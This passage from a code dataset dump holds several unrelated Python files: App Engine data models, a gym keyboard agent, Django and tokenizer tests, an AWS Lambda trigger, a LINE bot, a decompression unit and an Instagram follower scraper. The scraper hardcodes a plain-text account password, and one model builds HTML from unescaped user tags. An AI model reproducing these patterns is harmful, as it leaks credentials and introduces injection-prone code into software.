new_title[:20]+'...'+new_title[len(new_title)-10:]\n else:\n return new_title\n \n \n def __unicode__(self):\n if self.title:\n return self.title\n else:\n return ''.join(self.url.split('/')[-1:])\n \n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Channel(ndb.Model):\n name = ndb.StringProperty()\n private = ndb.BooleanProperty(default=False)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass ChannelUrl(ndb.Model):\n # Reference to Channel & Url\n channel = ndb.KeyProperty(kind=Channel)\n url = ndb.KeyProperty(kind=Url)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def rating(self):\n value=0\n rates=Rate.query(Rate.channelurl==self.key)\n for rate in rates:\n value=value+rate.value\n return value\n\n def extras(self,plain=False):\n xtra=''\n extras=Extra.query(Extra.channelurl==self.key)\n for extra in extras:\n if extra.comment:\n xtra=xtra+' '+extra.comment\n if extra.tag:\n if plain:\n xtra=xtra+extra.tag\n elif extra.tag=='WTF':\n xtra=xtra+' <span class=\"label label-danger\">'+extra.tag+'</span>'\n elif extra.tag=='NSFW':\n xtra=xtra+' <span class=\"label label-warning\">'+extra.tag+'</span>'\n else:\n xtra=xtra+' <span class=\"label label-primary\">'+extra.tag+'</span>'\n if extra.related:\n if plain:\n xtra=xtra+extra.related\n else:\n xtra=xtra+' <span class=\"label label-info\">'+extra.related+'</span>'\n return xtra.strip()\n\n def posts(self):\n chl=self.channel.get()\n msg=''\n msgs=[]\n posts=Post.query(Post.channelurl==self.key)\n for post in posts:\n msgs.append('%s/%s @ %s' % (post.user,chl.name,post.date))\n return ', '.join(msgs)\n \n def __unicode__(self):\n return unicode(self.key.id())\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n \nclass Post(ndb.Model):\n user = ndb.StringProperty()\n date = ndb.DateTimeProperty()\n\n # Reference to ChannelUrl\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = 
ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def __unicode__(self):\n return unicode(self.key.id())\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Rate(ndb.Model):\n user = ndb.StringProperty()\n value = ndb.IntegerProperty()\n\n # Reference to ChannelUrl\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def __unicode__(self):\n return '%s %+d' % (self.user, self.value)\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Extra(ndb.Model):\n user = ndb.StringProperty()\n related = ndb.StringProperty() \n tag = ndb.StringProperty() \n comment = ndb.StringProperty() \n\n # Reference to ChannelUrl\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def __unicode__(self):\n retval=''\n if self.comment:\n retval+=' '+self.comment\n if self.tag:\n retval+=' <a href=\"/url/tag/'+self.tag+'/\"><span class=\"label '\n if self.tag=='WTF':\n retval+='label-danger'\n elif self.tag=='NSFW':\n retval+='label-warning'\n else:\n retval+='label-primary'\n retval+='\">'+self.tag+'</span></a>'\n if self.related:\n retval+=' <a href=\"/url/view/'+self.related+'/\"><span class=\"label label-info\">'+self.related+'</span></a>'\n return retval.strip()\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n \n","sub_path":"url_models.py","file_name":"url_models.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"393182658","text":"#!/usr/bin/env python\nimport sys, gym, time\nfrom lunar_lander_bot import LunarLander\nimport pickle\nimport numpy as np\n\nenv = LunarLander()\n\nif not hasattr(env.action_space, 'n'):\n raise Exception('Keyboard agent only supports discrete action spaces')\nACTIONS = env.action_space.n\nSKIP_CONTROL = 0 # Use previous control decision SKIP_CONTROL times, that's how you\n # can test what skip is still usable.\n\nhuman_agent_action = 0\nhuman_wants_restart = False\nhuman_sets_pause = False\n\ndef key_press(key, mod):\n global human_agent_action, human_wants_restart, human_sets_pause\n if key==0xff0d: human_wants_restart = True\n if key==32: human_sets_pause = not human_sets_pause\n a = int( key - ord('0') )\n if a <= 0 or a >= ACTIONS: return\n human_agent_action = a\n\ndef key_release(key, mod):\n global human_agent_action\n a = int( key - ord('0') )\n if a <= 0 or a >= ACTIONS: return\n if human_agent_action == a:\n human_agent_action = 0\n\nenv.render()\nenv.unwrapped.viewer.window.on_key_press = key_press\nenv.unwrapped.viewer.window.on_key_release = key_release\n\ndef rollout(env):\n global human_agent_action, human_wants_restart, human_sets_pause\n human_wants_restart = False\n obser = env.reset()\n skip = 0\n total_reward = 0\n total_timesteps = 0\n while 1:\n if not skip:\n #print(\"taking action {}\".format(human_agent_action))\n a = human_agent_action\n total_timesteps += 1\n skip = SKIP_CONTROL\n else:\n skip -= 1\n obser, r, done, info = env.step(a)\n if r != 0:\n print(\"reward %0.3f\" % r)\n total_reward += r\n window_still_open = env.render()\n if window_still_open==False: return False\n if done: break\n if human_wants_restart: break\n # It's important to use binary mode\n dbfile = open('probs.p', 'rb')\n # source, destination\n proba = pickle.load(dbfile)\n dbfile.close()\n 
values = proba*100\n print(np.floor(values))\n while human_sets_pause:\n env.render()\n time.sleep(0.1)\n time.sleep(0.1)\n print(\"timesteps %i reward %0.2f\" % (total_timesteps, total_reward))\n\nwhile 1:\n window_still_open = rollout(env)\n if window_still_open==False: break\n","sub_path":"keyboard_agent.py","file_name":"keyboard_agent.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49020392","text":"from django.test.client import Client\nfrom django.test import TestCase, tag\nfrom django.urls import resolve\n\nfrom aidants_connect_web.views import usagers\nfrom aidants_connect_web.tests.factories import UserFactory, UsagerFactory\n\n\n@tag(\"usagers\")\nclass UsagersIndexPageTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.aidant = UserFactory()\n\n def test_usagers_index_url_triggers_the_usagers_index_view(self):\n found = resolve(\"/usagers/\")\n self.assertEqual(found.func, usagers.usagers_index)\n\n def test_usagers_index_url_triggers_the_usagers_index_template(self):\n self.client.force_login(self.aidant)\n response = self.client.get(\"/usagers/\")\n self.assertTemplateUsed(response, \"aidants_connect_web/usagers.html\")\n\n\n@tag(\"usagers\")\nclass UsagersDetailsPageTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.aidant = UserFactory()\n self.usager = UsagerFactory()\n\n def test_usagers_details_url_triggers_the_usagers_details_view(self):\n found = resolve(\"/usagers/1/\")\n self.assertEqual(found.func, usagers.usagers_details)\n","sub_path":"aidants_connect_web/tests/test_views/test_usagers.py","file_name":"test_usagers.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644982763","text":"r\"\"\"Test `lmp.tokenizer.CharDictTokenizer.decode`.\n\nUsage:\n python -m unittest test.lmp.tokenizer._char_dict_tokenizer.test_decode\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport gc\nimport inspect\nimport math\nimport unittest\n\nfrom typing import Iterable\n\n# self-made modules\n\nfrom lmp.tokenizer import CharDictTokenizer\n\n\nclass TestDecode(unittest.TestCase):\n r\"\"\"Test case for `lmp.tokenizer.CharDictTokenizer.decode`.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.vocab_source = [\n 'Hello World!',\n 'I am a legend.',\n ]\n\n @classmethod\n def tearDownClass(cls):\n del cls.vocab_source\n gc.collect()\n\n def setUp(self):\n r\"\"\"Setup both cased and uncased tokenizer instances.\"\"\"\n self.cased_tokenizer = CharDictTokenizer()\n self.cased_tokenizer.build_vocab(self.__class__.vocab_source)\n self.uncased_tokenizer = CharDictTokenizer(is_uncased=True)\n self.uncased_tokenizer.build_vocab(self.__class__.vocab_source)\n self.tokenizers = [self.cased_tokenizer, self.uncased_tokenizer]\n\n def tearDown(self):\n r\"\"\"Delete both cased and uncased tokenizer instances.\"\"\"\n del self.tokenizers\n del self.cased_tokenizer\n del self.uncased_tokenizer\n gc.collect()\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n\n self.assertEqual(\n inspect.signature(CharDictTokenizer.decode),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='self',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n ),\n 
inspect.Parameter(\n name='token_ids',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=Iterable[int],\n default=inspect.Parameter.empty\n ),\n inspect.Parameter(\n name='remove_special_tokens',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=bool,\n default=False\n )\n ],\n return_annotation=str\n ),\n msg=msg\n )\n\n def test_invalid_input_token_ids(self):\n r\"\"\"Raise `TypeError` when input `token_ids` is invalid.\"\"\"\n msg1 = 'Must raise `TypeError` when input `token_ids` is invalid.'\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, object(), lambda x: x, type, None,\n NotImplemented, ..., [0.0], [1.0], [math.nan], [-math.nan],\n [math.inf], [-math.inf], [0j], [1j], [''], [b''], [()], [[]], [{}],\n [set()], [object()], [lambda x: x], [type], [None],\n [NotImplemented], [...], [0, 0.0], [0, 1.0], [0, math.nan],\n [0, -math.nan], [0, math.inf], [0, -math.inf], [0, 0j], [0, 1j],\n [0, ''], [0, b''], [0, ()], [0, []], [0, {}], [0, set()],\n [0, object()], [0, lambda x: x], [0, type], [0, None],\n [0, NotImplemented], [0, ...],\n )\n\n for invalid_input in examples:\n for tokenizer in self.tokenizers:\n with self.assertRaises(TypeError, msg=msg1) as cxt_man:\n tokenizer.decode(token_ids=invalid_input)\n\n self.assertEqual(\n cxt_man.exception.args[0],\n '`token_ids` must be an instance of `Iterable[int]`.',\n msg=msg2\n )\n\n def test_invalid_input_remove_special_tokens(self):\n r\"\"\"Raise `TypeError` when input `remove_special_tokens` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` when input `remove_special_tokens` is '\n 'invalid.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf, -math.inf, 0j, 1j,\n '', b'', (), [], {}, set(), object(), lambda x: x, type, None,\n NotImplemented, ...,\n )\n\n for invalid_input in examples:\n for tokenizer in self.tokenizers:\n with self.assertRaises(TypeError, msg=msg1) as cxt_man:\n tokenizer.decode(\n token_ids=[],\n remove_special_tokens=invalid_input\n )\n\n self.assertEqual(\n cxt_man.exception.args[0],\n '`remove_special_tokens` must be an instance of `bool`.',\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `str`.\"\"\"\n msg = 'Must return `str`.'\n examples = (\n [0, 1, 2, 3],\n [4, 5, 6, 7, 8, 9],\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n [0],\n [],\n )\n\n for token_ids in examples:\n for tokenizer in self.tokenizers:\n self.assertIsInstance(\n tokenizer.decode(token_ids=token_ids),\n str,\n msg=msg\n )\n\n def test_remove_special_tokens(self):\n r\"\"\"Remove special tokens.\"\"\"\n msg = 'Must remove special tokens.'\n examples = (\n (\n False,\n [0, 10, 6, 4, 4, 7, 5, 11, 7, 12, 4, 8, 13, 1, 2],\n '[bos]Hello World![eos][pad]',\n '[bos]hello world![eos][pad]',\n ),\n (\n False,\n [0, 14, 5, 9, 15, 5, 9, 5, 3, 1, 2, 2],\n '[bos]I am a [unk][eos][pad][pad]',\n '[bos]i am a [unk][eos][pad][pad]',\n ),\n (\n False,\n [0, 19, 4, 6, 16, 6, 17, 8, 18, 1],\n '[bos][unk]legend.[eos]',\n '[bos][unk]legend.[eos]',\n ),\n (\n True,\n [0, 10, 6, 4, 4, 7, 5, 11, 7, 12, 4, 8, 13, 1, 2],\n 'Hello World!',\n 'hello world!',\n ),\n (\n True,\n [0, 14, 5, 9, 15, 5, 9, 5, 3, 1, 2, 2],\n 'I am a [unk]',\n 'i am a [unk]',\n ),\n (\n True,\n [0, 19, 4, 6, 16, 6, 17, 8, 18, 1],\n '[unk]legend.',\n '[unk]legend.',\n ),\n )\n\n for (\n remove_special_tokens,\n token_ids,\n cased_sequence,\n uncased_sequence\n ) in examples:\n self.assertEqual(\n 
self.cased_tokenizer.decode(\n token_ids=token_ids,\n remove_special_tokens=remove_special_tokens\n ),\n cased_sequence,\n msg=msg\n )\n self.assertEqual(\n self.uncased_tokenizer.decode(\n token_ids=token_ids,\n remove_special_tokens=remove_special_tokens\n ),\n uncased_sequence,\n msg=msg\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/tokenizer/_char_dict_tokenizer/test_decode.py","file_name":"test_decode.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"32047782","text":"import boto3\nimport json\nimport os\n\ndef handler(event, context):\n\n    print('Initiating image rekognition')\n\n    for record in event['Records']:\n        bucket = record['s3']['bucket']['name']\n        key = record['s3']['object']['key']\n\n        print('Detected the following image in S3')\n        print('Bucket: ' + bucket + ' key name: ' + key)\n        \n        ourObject = {\n            \"ourBucket\": bucket,\n            \"ourKey\": key\n        }\n\n        # Replace Step Function ARN\n\n        stepARN = os.environ['STEP_ARN']\n\n        client = boto3.client('stepfunctions')\n\n        print(json.dumps(ourObject))\n\n        response = client.start_execution(\n            stateMachineArn=stepARN,\n            input = json.dumps(ourObject)\n        )\n\n    return","sub_path":"cdk-findhuman/s3lambda/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"418974226","text":"\n\nimport pandas as pd\nimport re\n#\nfrom .. import global_var\nfrom . import compute_delivery_dates\n\n\ndef compute_delivery_windows(frequency = None,\n delivery_begin_year_local = None,\n delivery_period_index = None,\n profile = None,\n delivery_begin_date_local = None,\n delivery_end_date_local = None,\n tz_local = None,\n ):\n \"\"\"\n Computes the delivery windows of a given contract.\n \n :param frequency: The type of delivery contract (year, month, etc.)\n :param delivery_begin_year_local: The year of the delivery\n :param delivery_period_index: The index of the delivery contract\n :param profile: The profile of the delivery\n :param delivery_begin_date_local: The beginning date of the delivery\n :param delivery_end_date_local: The end date of the delivery\n :param tz_local: The local timezone\n :type frequency: string\n :type delivery_begin_year_local: int\n :type delivery_period_index: int\n :type profile: string\n :type delivery_begin_date_local: pd.Timestamp\n :type delivery_end_date_local: pd.Timestamp\n :type tz_local: pytz.tzfile\n :return: The delivery windows as a list of intervals\n :rtype: list of pairs of pd.Timestamp\n \"\"\"\n\n bloc_match = re.compile(global_var.contract_profile_bloc_pattern).match(profile)\n if ( frequency == global_var.contract_frequency_unknown\n or not ( bloc_match\n or profile in [global_var.contract_profile_gas,\n global_var.contract_profile_base,\n global_var.contract_profile_peak,\n global_var.contract_profile_ofpk,\n global_var.contract_profile_hour,\n global_var.contract_profile_half_hour,\n global_var.contract_profile_wday2024,\n global_var.contract_profile_wday1620,\n global_var.contract_profile_wend2024,\n ]\n )\n ):\n return None\n \n if not delivery_begin_date_local:\n delivery_begin_date_local, delivery_end_date_local = compute_delivery_dates(delivery_begin_year = delivery_begin_year_local,\n frequency = frequency,\n delivery_period_index = delivery_period_index,\n local_tz = tz_local,\n )\n else:\n dd, delivery_end_date_local = 
compute_delivery_dates(delivery_begin_year=delivery_begin_year_local,\n delivery_begin_date=delivery_begin_date_local,\n delivery_end_date=delivery_end_date_local,\n frequency=frequency,\n delivery_period_index=delivery_period_index,\n local_tz=tz_local,\n )\n if dd != delivery_begin_date_local:\n assert profile == global_var.contract_profile_peak, 'Incorrect begin_date, profile, frequency : {0}, {1}, {2}'.format(delivery_begin_date_local,\n profile,\n frequency,\n )\n \n if profile == global_var.contract_profile_gas:\n return [(delivery_begin_date_local.replace(hour = 6),\n delivery_end_date_local.replace(hour = 6),\n )]\n \n elif profile == global_var.contract_profile_base:\n return [(delivery_begin_date_local,\n delivery_end_date_local,\n )]\n\n elif profile == global_var.contract_profile_peak:\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = 8),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = 20),\n )\n for ii_day in range(( delivery_end_date_local.tz_localize(None)\n - delivery_begin_date_local.tz_localize(None)\n ).days)\n if ( (delivery_begin_date_local + pd.DateOffset(days = ii_day)).weekday() not in [5, 6]\n or (delivery_end_date_local - delivery_begin_date_local).days <= 2 # It seems that week peak contracts do not include weekends, but weekend peak products do exist\n )\n ]\n\n elif profile == global_var.contract_profile_ofpk:\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(( delivery_end_date_local.tz_localize(None)\n - delivery_begin_date_local.tz_localize(None)\n ).days)\n for begin_hour, end_hour in ([(0,8), (20,24)]\n if\n (delivery_begin_date_local + pd.DateOffset(days = ii_day)).weekday() not in [5,6]\n else\n [(0,24)]\n )\n ]\n\n elif profile == global_var.contract_profile_hour:\n hour_match = re.compile(global_var.contract_delivery_period_index_hour_pattern).match(str(delivery_period_index))\n hour = int(hour_match.group(3))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour),\n delivery_begin_date_local + pd.DateOffset(hours = hour + 1),\n )]\n\n elif profile == global_var.contract_profile_half_hour:\n half_hour_match = re.compile(global_var.contract_delivery_period_index_half_hour_pattern).match(str(delivery_period_index))\n hour = int(half_hour_match.group(3))\n minute = int(half_hour_match.group(4))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour, minutes = minute),\n delivery_begin_date_local + pd.DateOffset(hours = hour, minutes = minute + 30),\n )]\n\n elif bool(bloc_match):\n hour_begin = int(bloc_match.group(1))\n hour_end = int(bloc_match.group(2))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour_begin),\n delivery_begin_date_local + pd.DateOffset(hours = hour_end, days = int(hour_end < hour_begin)),\n )]\n \n elif profile == global_var.contract_profile_wday2024:\n begin_hour = 20\n end_hour = 24\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(5)\n ]\n\n elif profile == global_var.contract_profile_wday1620:\n begin_hour = 16\n end_hour = 20\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + 
pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(5)\n ]\n \n elif profile == global_var.contract_profile_wend2024:\n begin_hour = 20\n end_hour = 24\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(2)\n ]\n \n\n else:\n raise NotImplementedError('Incorrect profile : {0}'.format(profile))","sub_path":"pub_data_visualization/global_tools/compute_delivery_windows.py","file_name":"compute_delivery_windows.py","file_ext":"py","file_size_in_byte":8862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64221009","text":"import os\nimport sys\nimport time\nfrom flask import Flask\nfrom linebot import LineBotApi, WebhookParser\nfrom dotenv import load_dotenv\n\nfrom views import register_url\n\napp = Flask(__name__)\n\n# Load env variables\ndotenv_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.env')\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path=dotenv_path)\n\n# Set up config\napp.config.update({\n \"DEBUG\": True if os.getenv(\"DEBUG\") == \"True\" else False,\n \"DATABASE_URI\": os.getenv(\"DATABASE_URI\"),\n \"CHANNEL_ACCESS_TOKEN\": os.getenv(\"CHANNEL_ACCESS_TOKEN\", None),\n \"CHANNEL_SECRET\": os.getenv(\"CHANNEL_SECRET\", None),\n})\n\n# Create Linebot instance\ntry:\n app.linebot = LineBotApi(app.config['CHANNEL_ACCESS_TOKEN'])\n app.parser = WebhookParser(app.config['CHANNEL_SECRET'])\nexcept KeyError:\n app.logger.error(\"Please specify line CHANNEL_ACCESS_TOKEN and CHANNEL_SECRET.\")\n sys.exit(1)\n\n# Register routing rule\nregister_url(app)\n\ntime.sleep(5) # wait for postgresql to start\n\n# Base models will be created in routine container\napp.logger.info(\"START....\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547367317","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom .. import arg, Unit, RefineryPartialResult\nfrom ...lib.types import INF\n\nfrom .ap import aplib\nfrom .bz2 import bz2\nfrom .lz import lzma\nfrom .lznt1 import lznt1\nfrom .zl import zl\nfrom .lz4 import lz4\nfrom .blz import blz\n\n\nclass decompress(Unit):\n \"\"\"\n Attempts all available decompression units against the input and returns\n the output of the first successful one. If none succeeds, the data is\n returned unaltered. The process is heavily biased against LZNT1 decompression\n due to a large tendency for LZNT1 false positives.\n \"\"\"\n def __init__(\n self,\n prepend: arg.switch('-P', '--no-prepend', off=True, help=(\n 'By default, if decompression fails, the unit attempts to prefix '\n 'the data with all possible values of a single byte and decompress '\n 'the result. 
This behavior can be disabled with this flag.')\n ) = True,\n tolerance: arg.number('-t', help=(\n 'Maximum number of bytes to strip from the beginning of the data; '\n 'The default value is 12.')\n ) = 12,\n min_ratio: arg('-r', metavar='R', help=(\n 'To determine whether a decompression algorithm was successful, the '\n 'ratio of compressed size to decompressed size is required to be at '\n 'least this number, a floating point value R; default value is 1.')\n ) = 1,\n ):\n if min_ratio <= 0:\n raise ValueError('The compression factor must be positive.')\n super().__init__(tolerance=tolerance, prepend=prepend, min_ratio=min_ratio)\n self.engines = [\n engine() for engine in [zl, lzma, aplib, bz2, blz, lz4, lznt1]\n ]\n\n def process(self, data):\n best = None\n current_ratio = 1\n\n class result:\n unit = self\n\n def __init__(self, engine, cutoff=0, prefix=None):\n feed = data\n\n self.engine = engine\n self.prefix = prefix\n self.cutoff = cutoff\n\n if cutoff:\n feed = data[cutoff:]\n if prefix is not None:\n feed = prefix + data\n\n try:\n self.result = engine.process(feed)\n except RefineryPartialResult as pr:\n self.result = pr.partial\n except Exception:\n self.result = B''\n\n if not self.result:\n self.ratio = INF\n else:\n self.ratio = len(data) / len(self.result)\n\n @property\n def unmodified(self):\n return not self.prefix and not self.cutoff\n\n def schedule(self):\n nonlocal best, current_ratio\n if self.ratio >= self.unit.args.min_ratio:\n return\n prefix = hex(self.prefix[0]) if self.prefix else None\n r = 1 if self.unmodified and best and not best.unmodified else 0.9\n if self.engine.__class__ is lznt1:\n r /= 2\n if not best or self.ratio / current_ratio < r:\n self.unit.log_info(lambda: (\n F'obtained {self.ratio:.2f} compression ratio with: prefix={prefix}, '\n F'cutoff={self.cutoff}, engine={self.engine.name}'))\n best = self\n current_ratio = self.ratio\n\n for engine in self.engines:\n for t in range(self.args.tolerance):\n result(engine, t).schedule()\n if self.args.prepend:\n for p in range(0x100):\n result(engine, 0, bytes((p,))).schedule()\n\n if best is None:\n self.log_info('nothing worked, returning original data.')\n return data\n\n return best.result\n","sub_path":"refinery/units/compression/decompress.py","file_name":"decompress.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"453885832","text":"'''Bike'''\nclass Bike(object): #This section contains the Bike models with corresponding attributes\n    def __init__(self, name, weight, unitcost):\n        self.name = name\n        self.weight = weight\n        self.unitcost = unitcost\n    \n    def __repr__(self):\n        return \"{} Bike\".format(self.name)\n\nBMX = Bike(\"BMX\", 40, 150)\nMountain = Bike(\"Mountain\", 40, 175)\nCruiser = Bike(\"Cruiser\", 35, 225)\nRoad = Bike(\"Road\", 25, 300)\nHybrid = Bike(\"Hybrid\", 25, 550)\nCity = Bike(\"City\", 30, 600)\n\n'''Shop'''\nclass Shop(object): #Shops, they take inventory and money from Customers\n    def __init__(self, name, inventory=None, salemargin=1.20): #The sequence here must correspond in each subsequent line\n        self.name = name\n        self.salemargin = salemargin\n        self.profit = 0\n        if inventory != None:\n            self.inventory = inventory\n        else:\n            self.inventory = {}\n\n    def store_inventory(self):\n        print(self.inventory)\n    \n    def bike_filter(self, budget):\n        afford_list = []\n        for bike in self.inventory: \n            if bike.unitcost*self.salemargin <= budget: #Remember, self takes on the properties of the 
object, needs to be definite to attribute the properties\n afford_list.append(bike)\n return afford_list\n \n def sell_bike(self, name, customer): \n for bike in self.inventory:\n if bike.name == name:\n if self.inventory[bike] > 0:\n sale_price = bike.unitcost*self.salemargin \n if sale_price <= customer.budget:\n customer.budget -= sale_price\n customer.inventory.append(bike)\n self.inventory[bike] -= 1\n return\n else:\n print(\"Our apologies, you cannot afford this product.\")\n return\n else: \n print(\"Sorry, we're out...\")\n return\n \nprint(\"Here's what the Big Bike Store has to offer!\")\nBigBikeStore = Shop(\"Big Bike Store\", {BMX : 10, Mountain : 15, Cruiser : 15, Road : 20, Hybrid : 15, City : 10})\n\n\n'''Customer''' \nclass Customer(object): #Customers, Shops take money from them\n def __init__(self, name, budget, inventory=None):\n self.name = name\n self.budget = budget\n if inventory != None: #Inventory exists outside of the object/instance starting out, to be established, it has to be created independent of the instance...\n self.inventory = inventory\n else:\n self.inventory = []\n\nRonald = Customer(\"Ronald\", 200)\nFrancis = Customer(\"Francis\", 500)\nLois = Customer(\"Lois\", 1000)\n\n#Shows Big Bike Store inventory of bike types and number available\nBigBikeStore.store_inventory()\n\n#Filters affordable bikes based on the unit cost times the 20% sales margin increase for each customer's budget \nprint(\"What can each customer afford?\")\nBudgetedBikes = BigBikeStore.bike_filter(Ronald.budget)\nprint(Ronald.name, BudgetedBikes)\nBudgetedBikes = BigBikeStore.bike_filter(Francis.budget)\nprint(Francis.name, BudgetedBikes)\nBudgetedBikes = BigBikeStore.bike_filter(Lois.budget)\nprint(Lois.name, BudgetedBikes)\n\n#Sells the bike to each customer\nBigBikeStore.sell_bike(BMX.name, Ronald)\nBigBikeStore.sell_bike(Road.name, Francis)\nBigBikeStore.sell_bike(Hybrid.name, Lois)\n\n#Shows the bike in the customer's inventory\nprint(\"What's the choice for each customer?\")\nprint(Ronald.name, Ronald.inventory)\nprint(Francis.name, Francis.inventory)\nprint(Lois.name, Lois.inventory)\n\n#Shows customer's budget after sale\nprint(\"Show the customer and their leftover budget:\")\nprint(Ronald.name, Ronald.budget)\nprint(Francis.name, Francis.budget)\nprint(Lois.name, Lois.budget)\n\n#Shows store inventory after sale\nBigBikeStore.store_inventory()","sub_path":"thinkful/projects/bikeindustry/bikeindustry.py","file_name":"bikeindustry.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592719706","text":"from selenium import webdriver # selenium\nfrom selenium.webdriver.common.keys import Keys # selenium\nimport time # delay\nimport sys # loading bar\nimport threading # optimization\nfrom threading import Thread # optimization\n\ndef extract_driver(extract_type):\n driver = webdriver.Chrome(\"/Users/alazsengul/Desktop/chromedriver\")\n driver.get(\"https://www.instagram.com/\")\n\n time.sleep(2)\n\n # STEP 1 - - - Navigate to login page.\n driver.find_element_by_class_name('izU2O').find_element_by_tag_name('a').click()\n\n time.sleep(2)\n\n # STEP 2 - - - Input account information.\n login_inputs = driver.find_element_by_class_name('EPjEi').find_elements_by_class_name('zyHYP')\n login_inputs[0].send_keys('alazsengul')\n login_inputs[1].send_keys('kanyewest')\n\n # STEP 3 - - - Login.\n driver.find_element_by_class_name('yZn4P').click()\n\n time.sleep(2)\n\n # STEP 4 - - - Navigate 
to profile page of account.\n    driver.find_element_by_class_name('coreSpriteDesktopNavProfile').click()\n\n    time.sleep(2)\n\n    # STEP 5 - - - Store information about account.\n    li_numbers = driver.find_elements_by_class_name('g47SY ')\n    list_count = int(extract_number(li_numbers[extract_type].text))\n\n    # STEP 6 - - - Scroll and store through either followers or following list.\n    driver.find_element_by_class_name('k9GMp ').find_elements_by_class_name('Y8-fY ')[extract_type].click()\n\n    time.sleep(2)\n\n    action = webdriver.ActionChains(driver)\n    action.send_keys(Keys.END)\n    action.click()\n\n    list_index = 0\n\n    while (list_index < (list_count - 5)):\n        action.perform()\n        list_index = len(driver.find_elements_by_class_name('zsYNt'))\n\n    list_spans = driver.find_elements_by_class_name('zsYNt')\n\n    time.sleep(2)\n\n    final_list = [span.text for span in list_spans]\n\n    if (extract_type == 1):\n        owers_list.append(final_list)\n    elif (extract_type == 2):\n        owing_list.append(final_list)\n\n    driver.quit()\n\ndef extract_number(input_string):\n    string_list = []\n    for character in input_string:\n        if character.isdigit():\n            string_list.append(character)\n    final_string = \"\".join(string_list)\n    return(final_string)\n\ndef 